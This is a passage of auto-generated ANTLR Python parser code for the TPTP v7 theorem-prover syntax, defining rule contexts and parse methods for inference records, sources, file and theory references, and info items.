localctx = tptp_v7_0_0_0Parser.Inference_parentsContext(self, self._ctx, self.state)
self.enterRule(localctx, 314, self.RULE_inference_parents)
try:
self.state = 1398
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__16]:
self.enterOuterAlt(localctx, 1)
self.state = 1393
self.match(tptp_v7_0_0_0Parser.T__16)
pass
elif token in [tptp_v7_0_0_0Parser.T__11]:
self.enterOuterAlt(localctx, 2)
self.state = 1394
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1395
self.parent_list()
self.state = 1396
self.match(tptp_v7_0_0_0Parser.T__12)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
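# parent_list: one or more <parent_info> entries separated by ','.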
class Parent_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def parent_info(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Parent_infoContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Parent_infoContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_parent_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParent_list" ):
listener.enterParent_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParent_list" ):
listener.exitParent_list(self)
def parent_list(self):
localctx = tptp_v7_0_0_0Parser.Parent_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 316, self.RULE_parent_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1400
self.parent_info()
self.state = 1405
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1401
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1402
self.parent_info()
self.state = 1407
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
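# parent_info: a <source>, optionally followed by <parent_details>.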
class Parent_infoContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.SourceContext,0)
def parent_details(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Parent_detailsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_parent_info
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParent_info" ):
listener.enterParent_info(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParent_info" ):
listener.exitParent_info(self)
def parent_info(self):
localctx = tptp_v7_0_0_0Parser.Parent_infoContext(self, self._ctx, self.state)
self.enterRule(localctx, 318, self.RULE_parent_info)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1408
self.source()
self.state = 1410
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__13:
self.state = 1409
self.parent_details()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
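# parent_details: ':' followed by a <general_list>.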
class Parent_detailsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def general_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_parent_details
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParent_details" ):
listener.enterParent_details(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParent_details" ):
listener.exitParent_details(self)
def parent_details(self):
localctx = tptp_v7_0_0_0Parser.Parent_detailsContext(self, self._ctx, self.state)
self.enterRule(localctx, 320, self.RULE_parent_details)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1412
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 1413
self.general_list()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
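# internal_source: the 'introduced(intro_type[, useful_info])' form of a source term (TPTP v7 syntax).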
class Internal_sourceContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def intro_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Intro_typeContext,0)
def optional_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Optional_infoContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_internal_source
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInternal_source" ):
listener.enterInternal_source(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInternal_source" ):
listener.exitInternal_source(self)
def internal_source(self):
localctx = tptp_v7_0_0_0Parser.Internal_sourceContext(self, self._ctx, self.state)
self.enterRule(localctx, 322, self.RULE_internal_source)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1415
self.match(tptp_v7_0_0_0Parser.T__27)
self.state = 1416
self.intro_type()
self.state = 1418
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1417
self.optional_info()
self.state = 1420
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Intro_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Lower_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Lower_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_intro_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIntro_type" ):
listener.enterIntro_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIntro_type" ):
listener.exitIntro_type(self)
def intro_type(self):
localctx = tptp_v7_0_0_0Parser.Intro_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 324, self.RULE_intro_type)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1422
self.match(tptp_v7_0_0_0Parser.Lower_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
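# external_source: a <file_source>, a <theory>, or a <creator_source>.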
class External_sourceContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def file_source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.File_sourceContext,0)
def theory(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.TheoryContext,0)
def creator_source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Creator_sourceContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_external_source
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExternal_source" ):
listener.enterExternal_source(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExternal_source" ):
listener.exitExternal_source(self)
def external_source(self):
localctx = tptp_v7_0_0_0Parser.External_sourceContext(self, self._ctx, self.state)
self.enterRule(localctx, 326, self.RULE_external_source)
try:
self.state = 1427
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__28]:
self.enterOuterAlt(localctx, 1)
self.state = 1424
self.file_source()
pass
elif token in [tptp_v7_0_0_0Parser.T__29]:
self.enterOuterAlt(localctx, 2)
self.state = 1425
self.theory()
pass
elif token in [tptp_v7_0_0_0Parser.T__30]:
self.enterOuterAlt(localctx, 3)
self.state = 1426
self.creator_source()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
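# file_source: 'file(file_name[, file_info])' — an external source read from a TPTP file.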
class File_sourceContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def file_name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.File_nameContext,0)
def file_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.File_infoContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_file_source
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFile_source" ):
listener.enterFile_source(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFile_source" ):
listener.exitFile_source(self)
def file_source(self):
localctx = tptp_v7_0_0_0Parser.File_sourceContext(self, self._ctx, self.state)
self.enterRule(localctx, 328, self.RULE_file_source)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1429
self.match(tptp_v7_0_0_0Parser.T__28)
self.state = 1430
self.file_name()
self.state = 1432
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1431
self.file_info()
self.state = 1434
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
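# file_info: ',' followed by the <name> of the formula within the referenced file.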
class File_infoContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_file_info
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFile_info" ):
listener.enterFile_info(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFile_info" ):
listener.exitFile_info(self)
def file_info(self):
localctx = tptp_v7_0_0_0Parser.File_infoContext(self, self._ctx, self.state)
self.enterRule(localctx, 330, self.RULE_file_info)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1436
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1437
self.name()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
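# theory: 'theory(theory_name[, useful_info])'.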
class TheoryContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def theory_name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Theory_nameContext,0)
def optional_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Optional_infoContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_theory
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTheory" ):
listener.enterTheory(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTheory" ):
listener.exitTheory(self)
def theory(self):
localctx = tptp_v7_0_0_0Parser.TheoryContext(self, self._ctx, self.state)
self.enterRule(localctx, 332, self.RULE_theory)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1439
self.match(tptp_v7_0_0_0Parser.T__29)
self.state = 1440
self.theory_name()
self.state = 1442
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1441
self.optional_info()
self.state = 1444
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Theory_nameContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Lower_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Lower_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_theory_name
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTheory_name" ):
listener.enterTheory_name(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTheory_name" ):
listener.exitTheory_name(self)
def theory_name(self):
localctx = tptp_v7_0_0_0Parser.Theory_nameContext(self, self._ctx, self.state)
self.enterRule(localctx, 334, self.RULE_theory_name)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1446
self.match(tptp_v7_0_0_0Parser.Lower_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
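# creator_source: 'creator(creator_name[, useful_info])'.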
class Creator_sourceContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def creator_name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Creator_nameContext,0)
def optional_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Optional_infoContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_creator_source
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCreator_source" ):
listener.enterCreator_source(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCreator_source" ):
listener.exitCreator_source(self)
def creator_source(self):
localctx = tptp_v7_0_0_0Parser.Creator_sourceContext(self, self._ctx, self.state)
self.enterRule(localctx, 336, self.RULE_creator_source)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1448
self.match(tptp_v7_0_0_0Parser.T__30)
self.state = 1449
self.creator_name()
self.state = 1451
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1450
self.optional_info()
self.state = 1453
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Creator_nameContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_creator_name
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCreator_name" ):
listener.enterCreator_name(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCreator_name" ):
listener.exitCreator_name(self)
def creator_name(self):
localctx = tptp_v7_0_0_0Parser.Creator_nameContext(self, self._ctx, self.state)
self.enterRule(localctx, 338, self.RULE_creator_name)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1455
self.atomic_word()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
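# optional_info: ',' followed by a <useful_info> term.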
class Optional_infoContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def useful_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Useful_infoContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_optional_info
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOptional_info" ):
listener.enterOptional_info(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOptional_info" ):
listener.exitOptional_info(self)
def optional_info(self):
localctx = tptp_v7_0_0_0Parser.Optional_infoContext(self, self._ctx, self.state)
self.enterRule(localctx, 340, self.RULE_optional_info)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1457
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1458
self.useful_info()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
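# useful_info: '[]', a bracketed list of <info_item>s, or a <general_list>.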
class Useful_infoContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def info_items(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Info_itemsContext,0)
def general_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_useful_info
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterUseful_info" ):
listener.enterUseful_info(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitUseful_info" ):
listener.exitUseful_info(self)
def useful_info(self):
localctx = tptp_v7_0_0_0Parser.Useful_infoContext(self, self._ctx, self.state)
self.enterRule(localctx, 342, self.RULE_useful_info)
try:
self.state = 1466
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,109,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1460
self.match(tptp_v7_0_0_0Parser.T__16)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1461
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1462
self.info_items()
self.state = 1463
self.match(tptp_v7_0_0_0Parser.T__12)
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1465
self.general_list()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
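# info_items: one or more <info_item> entries separated by ','.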
class Info_itemsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def info_item(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Info_itemContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Info_itemContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_info_items
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInfo_items" ):
listener.enterInfo_items(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInfo_items" ):
listener.exitInfo_items(self)
def info_items(self):
localctx = tptp_v7_0_0_0Parser.Info_itemsContext(self, self._ctx, self.state)
self.enterRule(localctx, 344, self.RULE_info_items)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1468
self.info_item()
self.state = 1473
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1469
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1470
self.info_item()
self.state = 1475
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
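# info_item: a <formula_item>, an <inference_item>, or a <general_function>.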
class Info_itemContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def formula_item(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_itemContext,0)
def inference_item(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Inference_itemContext,0)
def general_function(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_functionContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_info_item
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInfo_item" ):
listener.enterInfo_item(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInfo_item" ):
listener.exitInfo_item(self)
def info_item(self):
localctx = tptp_v7_0_0_0Parser.Info_itemContext(self, self._ctx, self.state)
self.enterRule(localctx, 346, self.RULE_info_item)
try:
self.state = 1479
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,111,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1476
self.formula_item()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1477
self.inference_item()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1478
self.general_function()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
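# formula_item: a <description_item> or an <iquote_item>.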
class Formula_itemContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def description_item(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Description_itemContext,0)
def iquote_item(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Iquote_itemContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_formula_item
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFormula_item" ):
listener.enterFormula_item(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFormula_item" ):
listener.exitFormula_item(self)
def formula_item(self):
localctx = tptp_v7_0_0_0Parser.Formula_itemContext(self, self._ctx, self.state)
self.enterRule(localctx, 348, self.RULE_formula_item)
try:
self.state = 1483
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__31]:
self.enterOuterAlt(localctx, 1)
self.state = 1481
self.description_item()
pass
elif token in [tptp_v7_0_0_0Parser.T__32]:
self.enterOuterAlt(localctx, 2)
self.state = 1482
self.iquote_item()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Description_itemContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_description_item
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDescription_item" ):
listener.enterDescription_item(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDescription_item" ):
listener.exitDescription_item(self)
def description_item(self):
localctx = tptp_v7_0_0_0Parser.Description_itemContext(self, self._ctx, self.state)
self.enterRule(localctx, 350, self.RULE_description_item)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1485
self.match(tptp_v7_0_0_0Parser.T__31)
self.state = 1486
self.atomic_word()
self.state = 1487
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Iquote_itemContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_iquote_item
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIquote_item" ):
listener.enterIquote_item(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIquote_item" ):
listener.exitIquote_item(self)
def iquote_item(self):
localctx = tptp_v7_0_0_0Parser.Iquote_itemContext(self, self._ctx, self.state)
self.enterRule(localctx, 352, self.RULE_iquote_item)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1489
self.match(tptp_v7_0_0_0Parser.T__32)
self.state = 1490
self.atomic_word()
self.state = 1491
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
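# inference_item: an <inference_status>, <assumptions_record>, <new_symbol_record>, or <refutation>.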
class Inference_itemContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def inference_status(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Inference_statusContext,0)
def assumptions_record(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Assumptions_recordContext,0)
def new_symbol_record(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.New_symbol_recordContext,0)
def refutation(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.RefutationContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_inference_item
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInference_item" ):
listener.enterInference_item(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInference_item" ):
listener.exitInference_item(self)
def inference_item(self):
localctx = tptp_v7_0_0_0Parser.Inference_itemContext(self, self._ctx, self.state)
self.enterRule(localctx, 354, self.RULE_inference_item)
try:
self.state = 1497
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__33, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1493
self.inference_status()
pass
elif token in [tptp_v7_0_0_0Parser.T__34]:
self.enterOuterAlt(localctx, 2)
self.state = 1494
self.assumptions_record()
pass
elif token in [tptp_v7_0_0_0Parser.T__36]:
self.enterOuterAlt(localctx, 3)
self.state = 1495
self.new_symbol_record()
pass
elif token in [tptp_v7_0_0_0Parser.T__35]:
self.enterOuterAlt(localctx, 4)
self.state = 1496
self.refutation()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
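# inference_status: 'status(status_value)' or a free-form <inference_info>.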
class Inference_statusContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def status_value(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Status_valueContext,0)
def inference_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Inference_infoContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_inference_status
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInference_status" ):
listener.enterInference_status(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInference_status" ):
listener.exitInference_status(self)
def inference_status(self):
localctx = tptp_v7_0_0_0Parser.Inference_statusContext(self, self._ctx, self.state)
self.enterRule(localctx, 356, self.RULE_inference_status)
try:
self.state = 1504
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__33]:
self.enterOuterAlt(localctx, 1)
self.state = 1499
self.match(tptp_v7_0_0_0Parser.T__33)
self.state = 1500
self.status_value()
self.state = 1501
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif token in [tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 2)
self.state = 1503
self.inference_info()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Status_valueContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Lower_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Lower_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_status_value
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterStatus_value" ):
listener.enterStatus_value(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitStatus_value" ):
listener.exitStatus_value(self)
def status_value(self):
localctx = tptp_v7_0_0_0Parser.Status_valueContext(self, self._ctx, self.state)
self.enterRule(localctx, 358, self.RULE_status_value)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1506
self.match(tptp_v7_0_0_0Parser.Lower_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
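# inference_info: inference_rule '(' atomic_word ',' general_list ')'.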
class Inference_infoContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def inference_rule(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Inference_ruleContext,0)
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def general_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_inference_info
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInference_info" ):
listener.enterInference_info(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInference_info" ):
listener.exitInference_info(self)
def inference_info(self):
localctx = tptp_v7_0_0_0Parser.Inference_infoContext(self, self._ctx, self.state)
self.enterRule(localctx, 360, self.RULE_inference_info)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1508
self.inference_rule()
self.state = 1509
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1510
self.atomic_word()
self.state = 1511
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1512
self.general_list()
self.state = 1513
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
